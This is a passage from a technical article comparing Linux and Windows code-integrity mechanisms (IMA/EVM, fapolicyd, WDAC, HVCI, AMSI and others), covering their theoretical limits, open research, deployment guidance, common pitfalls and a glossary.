Trust grant coarser than exploit unitRPM trust pre-fapolicyd integrity-mode additionWDAC Publisher rules + LOLBinsTrust algebra cannot express "Microsoft except mshta" with one ruleHash-level denies, growing block list
Reference value reachable by attackerIMA without EVM(HVCI moved the kernel verifier out of reach)Reference value next to the file under attacker controlEVM HMAC sealed to TPM PCR
Verifier is killablefapolicyd daemon failure(HVCI verifier is hypervisor-isolated)Verifier liveness is part of the trust assumptionTPM-sealed boot policy + kernel-mode fallback

The first row is the most uncomfortable for both stacks. Linux does not have an AMSI-equivalent in production, so there is no in-kernel hook that sees the buffer an interpreter is about to evaluate; the boundary is not "wrong", it simply does not exist. Windows has the hook and has paid for the consequences of putting it in the wrong place for ten years. Neither result is good.

The lesson from both rows of pivots is consistent: when an architecture is forced to put the verifier somewhere reachable, treat its output as telemetry rather than control, and budget for the bypass.

These are not implementation bugs. They are structural features of the architectures, and to understand why, we have to look at what computer science says is and is not possible.

8. What the theory says

Three impossibility results bound everything in this article. Two are decades old; the third is a property of how modern interpreted languages execute.

Rice's theorem

Rice's 1953 theorem says that any non-trivial semantic property of an arbitrary program is undecidable from the program text alone. Applied to malware: there is no algorithm that takes a binary as input and returns "malicious" or "benign" in finite time for every input.

Every code-integrity stack on the market therefore reduces to the same shape: an allowlist of producers (signers, hashes, dm-verity roots) the operator chooses to trust, plus a hook that refuses to honour anything outside the allowlist. Defender, ClamAV, the AMSI scanner -- all the things we call "malware detectors" -- are heuristic add-ons running on top of an allowlist substrate, and they are explicitly fallible. They have to be.

No software-only protection of an in-process secret

The second result is operational, not formal, but it is no less binding. If process P holds a secret S, and process P also evaluates code C the attacker chose, then no purely software-side technique inside P can keep C from reading or rewriting S.

AMSI's design violates this: the scanner is a function call inside the script host, and the attacker is running code in the script host. HVCI's entire architecture exists to relocate the kernel-mode code-integrity verifier out of the host's address space, into a secure kernel the attacker cannot reach with normal kernel privileges. EVM's design likewise moves the integrity-defining key into a kernel keyring sealed to TPM PCRs so an offline attacker with disk access cannot reach it.

No verification of dynamically generated executable code

The third result is the gap on both operating systems. JIT-compiled code (V8, JVM, CLR), libffi closures, and anonymous mmap followed by mprotect(PROT_EXEC) all produce executable bytes that did not exist on disk and were never hashed.

The IPE documentation lists this as an explicit limitation: a property-based check on the file the JIT compiled does not authenticate the bytes the JIT emitted. WDAC's User-Mode Code Integrity has the same gap for managed runtimes that emit IL at runtime. There is no production answer on either side; there are only mitigations: disable JITs where possible, run them in restricted runtimes (Constrained Language Mode), block the trampolines.

The JIT gap is one reason both stacks ship "Constrained Language Mode"-style restricted-runtime options. PowerShell's Constrained Language Mode blocks reflection and dynamic-type creation; the JVM's --module-path and module-system encapsulation play a similar role for hosted Java code; the CLR's AppContainer and the .NET Core trim modes lean the same way. None of these "verify" the JIT output; they restrict what the runtime is willing to emit.

Cryptographic bounds

The cryptographic side, by contrast, is closed.

  • Any preimage-resistant hash needs Ω(n)\Omega(n) work on the data being hashed. You cannot verify a file you do not read.
  • A Merkle tree with leaf size kk over a file of size nn reduces this to O(log(n/k))O(\log(n/k)) per partial read. The classic Merkle 1979 construction underlies dm-verity, fs-verity, and the Android APK Signature Scheme v4. fs-verity matches this lower bound.
  • Whole-file SHA-256 on modern x86 with SHA-NI runs at roughly 2 GB/s2 \text{ GB/s} per core; SHA-512 at 1.4 GB/s\sim 1.4 \text{ GB/s}. A 100 MB binary verifies in roughly 50 ms50 \text{ ms} worst-case and 0 ms0 \text{ ms} cached. RSA-2048 and Ed25519 signature verification both finish in well under a millisecond on modern hardware (tens to a few hundred microseconds depending on CPU and library); verify cost is not the bottleneck.

So on the crypto side the gap between upper and lower bounds is closed. On the policy-expressiveness side there is no "best" policy because the right policy depends on threat model. There is no Pareto frontier; there are only trade-offs.

BoundWhat it saysMechanism that matches itRemaining gap
Rice's theorem"Is this binary malicious?" is undecidableEvery CI stack is an allowlist + signer modelAllowlist composition is itself a policy problem
In-process secretNo purely-software defence inside the attacker's address spaceHVCI moves verifier to VTL1; EVM key in keyring sealed to TPMAMSI design violates this; the gap is structural
Hash verificationΩ(n)\Omega(n) per full read; O(logn)O(\log n) per partial readfs-verity per page; IMA cached on i_iversionCold-cache cost remains O(n) for non-fs-verity files
JIT and dynamic codeNo way to verify code that did not exist on diskNoneRestricted-runtime modes (CLM, AppContainer) are the best partial answer
Asymmetric verifyAbout 60-300 us per RSA-2048 or Ed25519 verify on modern x86Authenticode catalogues amortise; IMA caches in inodeCold cache is the only sensitive case

Crypto is closed. Policy expressiveness and trust-boundary protection are theoretically unsolvable in general. Every stack is an allowlist plus a trusted-signer model, never a malware detector. The wall is theoretical, not engineering.

If the theory says we cannot win, what is research targeting in 2026?

9. Open frontiers

Three problems define the 2026 research front. All are being worked on upstream. None will dissolve the theoretical bounds of Section 8.

Linux integrity at distribution scale: the Integrity Digest Cache

IMA appraisal has a scale problem. On a general-purpose Linux distribution where every file is RPM-signed, asking IMA to verify a per-file imasig signature on every open is expensive.

Roberto Sassu (Huawei Cloud) proposed a fix as the digest_cache LSM in version 3 of the patchset, posted in February 2024 and covered on LWN. The v3 cover letter is concrete: "Preliminary tests have shown a speedup of IMA appraisal of about 65% for sequential read, and 45% for parallel read." The design extracts pre-computed reference digests from vendor-signed digest lists (RPM headers, kernel TLV digest-list format, third-party formats via loadable parsers) and exposes a digest_cache_lookup() primitive that integrity providers (IMA, IPE, BPF LSM) call instead of verifying per-file signatures.

By v6 in November 2024 the work had been retitled "Introduce the Integrity Digest Cache" and pivoted from a standalone LSM into an integrity-subsystem helper, in response to maintainer feedback. The v6 cover letter quantifies the baseline the design attacks: IMA measurement "introduces a noticeable overhead (up to 10x slower in a microbenchmark) on frequently used system calls, like the open()." Discussion continues on the linux-integrity list; memory safety of the TLV parser was verified with the Frama-C static analyser. As of late 2024 the work is not yet upstream.

"Preliminary tests have shown a speedup of IMA appraisal of about 65% for sequential read, and 45% for parallel read." -- Roberto Sassu, digest_cache LSM v3 cover letter, February 2024

The important framing correction: the Integrity Digest Cache is not a Linux AMSI equivalent. AMSI is an interpreter-side scanner of the deobfuscated, about-to-execute script buffer. The Integrity Digest Cache is a file-content digest delivery mechanism that closes the same gap IMA already closes, but more efficiently and at distribution scale. The Linux script-content gap remains genuinely open.

Out-of-process AMSI broker

The conjectural fix on the Windows side is an out-of-process AMSI broker: every AmsiScanBuffer call IPCs to a service running outside the script host's address space. The in-process bypass family disappears because the attacker is no longer in the same process as the scanner. The cost is a context switch and serialisation overhead per script eval.

Microsoft has layered partial mitigations -- signed AMSI provider DLLs from 1903, ETW patch detection in Defender, Constrained Language Mode under App Control -- but no full out-of-process redesign exists. Whether it ever will is a function of how willing Microsoft is to pay the latency cost on hot PowerShell loops.

Cross-OS attestation

A verifier validating evidence from a mixed Linux + Windows fleet today must speak two languages at once. IMA's measurement-log format (ima_template_fmt) and Windows Measured Boot's WBCL both target TPM PCRs but encode events differently.

Confidential-computing efforts (Intel TDX, AMD SEV-SNP) are pushing toward a common report/quote primitive at the platform layer, and the TCG Canonical Event Log Format aims at a portable per-entry representation. Workload-level integrity proofs remain stack-specific. The two operating systems do not yet speak a common attestation language.

ProblemCurrent best partial resultUpstream status
IMA appraisal scale on RPM-signed distrosIntegrity Digest Cache, 45-65% appraisal speedupPatchset v6 (Nov 2024); not upstream
AMSI in-process trust boundarySigned provider DLLs, ETW patch detection, CLMPartial; structural fix would be OOP broker
Linux script-content scanningNothing in productionOpen
Cross-OS attestation interopTCG CEL, TDX/SEV-SNP quotesPlatform-layer; workload-level still split
WDAC LOLBin treadmillMicrosoft block list + LOLBAS + WDAC WizardOperational; structural fix unknown

Each of these will probably ship in the 2026-2028 window. None of them dissolves the theoretical bounds of Section 8. The job for a defender in 2026 is therefore operational, not technological.

10. Practitioner decision guide

Eight common deployment scenarios. Eight concrete answers.

If you need...On Linux, use...On Windows, use...
TPM-backed remote attestationIMA + EVM (TPM PCR 10)Measured Boot + TPM PCR 11 + HVCI
Block unsigned driversmodule.sig_enforce=1 plus kernel module signingHVCI (Memory Integrity)
Cryptographic allowlist of installed softwarefapolicyd (RPM/DEB trust)App Control with Publisher rules
Per-app sandboxAppArmor or SELinuxAppContainer or App Control (no direct equivalent)
Catch in-memory PowerShell payloads(no direct equivalent)AMSI
Consumer-grade reputation gating(no direct equivalent)Smart App Control
Immutable appliance imagedm-verity + IPEApp Control with hash rules + HVCI
Large APK-style assets verified lazilyfs-verity(no direct equivalent)

The why behind each row.

TPM-backed attestation. On Linux, IMA's measurement mode extends file hashes into PCR 10 and ships the measurement log to a remote verifier (Keylime, Veraison). On Windows it means consuming the Measured Boot event log a Windows kernel emits while VBS+HVCI is enabled. Both stacks target the same root of trust (the TPM) but speak different event formats.

Blocking unsigned drivers. Linux uses a built-in kernel module signing flag. Windows needs HVCI, because the kernel-mode CI check runs in VTL1 and any policy weakening attempted from VTL0 with SYSTEM cannot reach it.

Application allowlisting on general-purpose distributions. This is fapolicyd's wheelhouse: it inherits trust from the RPM/DEB database, which is the only place a general-purpose distro has a clean "trusted" list. On Windows, App Control with publisher rules plus a managed-installer policy is the equivalent.

Per-app sandboxing. Clean Linux story (AppArmor or SELinux per binary). On Windows it is the gap App Control was never quite designed to fill; AppContainer or Microsoft Defender Attack Surface Reduction rules are the substitutes.

In-memory PowerShell payloads. AMSI's use case. Linux has nothing equivalent in production.

Consumer reputation gating. Smart App Control's use case. Linux distros have nothing equivalent because the distribution-package model already plays that role.

Immutable appliance images. Dm-verity plus IPE on Linux. App Control hash rules plus HVCI on Windows.

Large lazy-loaded assets. Fs-verity territory; Windows has no public equivalent.

Common implementation pitfalls

Distilled from the same shape: every stack has a default that surprises operators.

  • IMA without EVM and without a TPM-sealed key is decorative. Hashing files into an xattr the attacker can rewrite buys you nothing against offline access. EVM is mandatory; the EVM key must be sealed.
  • AppArmor profiles authored in complain mode never get promoted to enforce. Schedule a config-management pass that runs aa-enforce on the profiles you actually want to confine.
  • SELinux setenforce 0 for debugging that becomes permanent. The /.autorelabel flag is required after restoring contexts; track that you flipped it.
  • fapolicyd permissive-mode lapses. Set up alerting on permissive=1 in the runtime configuration; treat the daemon's exit status as a security event.
  • WDAC's Enabled:Audit Mode policy-rule option is on by default. Policies silently do not enforce until you remove it. Add a deployment check that asserts audit mode is off before declaring rollout complete.
  • HVCI without a driver-compatibility check. Microsoft's DG_Readiness_Tool and the HVCI compatibility report belong in every pilot. Vendors that allocate RWX kernel pages will fail HVCI loading and leave the host unbootable.
  • Treating AMSI as a control. It is telemetry. Budget for the bypass on day one.
  • Smart App Control disable is one-way. A single mis-click ends the consumer reputation gate until the device is reset. Make sure the user understands this before they tap the toggle.

Frequently asked questions

Should I enable IMA appraise mode on a general-purpose Linux server?

Usually no, unless your distribution signs every system file (most do not for imasig in production) and you have a TPM-sealed EVM key. For general-purpose servers, fapolicyd with RPM-database trust is usually the right answer; it inherits trust from packages you already trust and does not require kernel-side signature infrastructure. Reserve IMA appraise for appliance / fixed-function builds, embedded distros, or fleets with a signed-package pipeline.

Why does AppArmor work for me when SELinux gave me headaches?

Path-based reasoning maps to how administrators think about confinement: "this binary may read /etc/nginx, may write /var/log/nginx, may bind a network socket." SELinux's type-enforcement model is more expressive (it lets a single rule cover an entire class of objects across paths and bind mounts), but it requires the administrator to think in compiled-policy terms. Both are correct; pick the one whose mental model matches your team. The right answer on Ubuntu and SUSE is almost always AppArmor; the right answer on RHEL and Android is almost always SELinux.

Can I block all LOLBins with one WDAC policy?

No. Microsoft's block list grows whenever a new signed binary turns out to host an attacker-friendly evaluator. Treat WDAC as defence-in-depth, layered with HVCI and AMSI-as-telemetry, not as a single-point allowlist. The WDAC Wizard and AaronLocker projects automate keeping the deny set current; even with them, expect the deny set to evolve every quarter.

Is AMSI worth enabling if it is bypassable?

Yes. Enable it, but configure it as a telemetry source feeding Defender for Endpoint and any EDR pipeline you operate. The bypass family of Section 7 is real, but the un-bypassed case still catches the long tail of script-based attacks that do not bother defeating AMSI, and the bypass attempt itself is highly detectable (in-memory patch ETW events). Treat AMSI alerts as detective controls, not preventive controls.

Does HVCI hurt my battery life or performance?

On CPUs with Intel MBEC (Kaby Lake or newer) or AMD GMET (Zen 2 or newer), the steady-state overhead is generally under 5 percent. On older CPUs that rely on the Restricted User Mode emulation path, kernel-bound workloads can see 10 to 20 percent regressions. Run your specific kernel-bound benchmarks on the actual hardware before enabling on a fleet with a mixed CPU generation; "free" is a Kaby Lake-and-newer claim.

Will Smart App Control work on my Windows 11 enterprise laptop?

Usually no. SAC auto-disables on enterprise-managed devices (Intune-enrolled, Azure AD-joined, or under Group Policy management) at the end of the 48-hour evaluation window unless the user explicitly opts in. The intended deployment model is that enterprises use full App Control with a managed-installer policy, not SAC. If SAC has already auto-disabled and you actually want it on, the only path to re-enable is a clean install of Windows. A Settings > Reset This PC does not bring it back.

The two architectures answer the same question with different trade-offs. A practitioner in 2026 needs both maps, because the bypass that breaks the Linux side rarely looks like the bypass that breaks the Windows side, and the mitigation that fixes one is rarely the mitigation that fixes the other.

What stays constant is the lesson the two lineages converged on over fifteen years: the trust boundary is the architecture. Move the verifier out of reach. Allowlist the producers. Treat the things that cannot be moved as telemetry, not as control. None of that closes Rice's wall, but all of it pushes the actual exploitable surface back another mile, on both operating systems.

Study guide

Key terms

IMA
Linux Integrity Measurement Architecture. Hashes files at LSM hook points; can measure (record into TPM PCR 10), appraise (block on mismatch), or audit.
EVM
Extended Verification Module. HMACs (or signs) the security xattrs IMA depends on, so an offline attacker who rewrites security.ima cannot also forge security.evm.
AppArmor
Path-based Linux MAC, merged to mainline in 2.6.36 (Oct 2010). Default on Ubuntu and SUSE. Profiles are loaded from user space and compiled to in-kernel DFAs.
SELinux
Label-based Linux MAC merged to mainline in 2.6.0 (Dec 2003). Default on RHEL, Fedora, Oracle Linux, Android. Type-enforcement on subject x object x class.
fapolicyd
Red Hat userspace allowlister sitting on the fanotify permission channel. Trust inherited from the RPM database; rules in /etc/fapolicyd/rules.d/.
fs-verity
Per-file Merkle-tree authenticity, Linux 5.4 (Nov 2019). O(log n) per-page verification; constant-time digest retrieval; supported on ext4, f2fs, btrfs.
IPE
Integrity Policy Enforcement, Linux 6.12 (Nov 2024). Property-based decisions: dm-verity root hash, fs-verity digest, initramfs origin. O(1) per access.
WDAC / App Control
Windows code-integrity policy mechanism, originally Device Guard (Windows 10 1507). Signed XML compiled to .p7b, evaluated at PE load. Renamed App Control for Business in 2024.
HVCI / Memory Integrity
Hypervisor-Protected Code Integrity. Kernel-mode CI check moved into VTL1 of Hyper-V, isolated from the VTL0 normal kernel. Same mechanism marketed under three names.
AMSI
Antimalware Scan Interface. In-process script-broker COM API (AmsiScanBuffer) called by PowerShell, WSH, VBA, MSHTA, UAC installer, .NET. Provider is Defender by default.
Smart App Control
Consumer-facing pre-baked WDAC policy shipped with Windows 11 22H2. 48-hour evaluation window, one-way disable, cloud reputation via the Intelligent Security Graph.
LSM
Linux Security Modules. Kernel framework merged Dec 2003 that hosts security modules at well-defined hook points. Hosts SELinux, AppArmor, IMA, EVM, IPE, BPF LSM, Landlock.
MAC
Mandatory Access Control. Kernel-enforced policy layer above DAC that no userspace privilege can override; the operator, not the file owner, sets policy.
TPM PCR 10
The TPM Platform Configuration Register IMA extends file-content hashes into. Monotonic, extendable as PCR_new = SHA256(PCR_old || hash); used as the anchor for remote attestation.
Authenticode
Microsoft's PE signing format. Anchors WDAC's Publisher, PcaCertificate, and LeafCertificate rule kinds; signed catalogues (.cat) provide pre-computed hashes for catalogued files.
LOLBin
Living-Off-the-Land Binary. A trusted binary, often vendor-signed, repurposed by attackers to bypass an allowlist (e.g. mshta.exe evaluating an HTA blob).
Constrained Language Mode
Reduced PowerShell language mode App Control forces with UMCI on. Blocks reflection, dynamic-type creation, and arbitrary .NET API calls; restricts evaluation surface.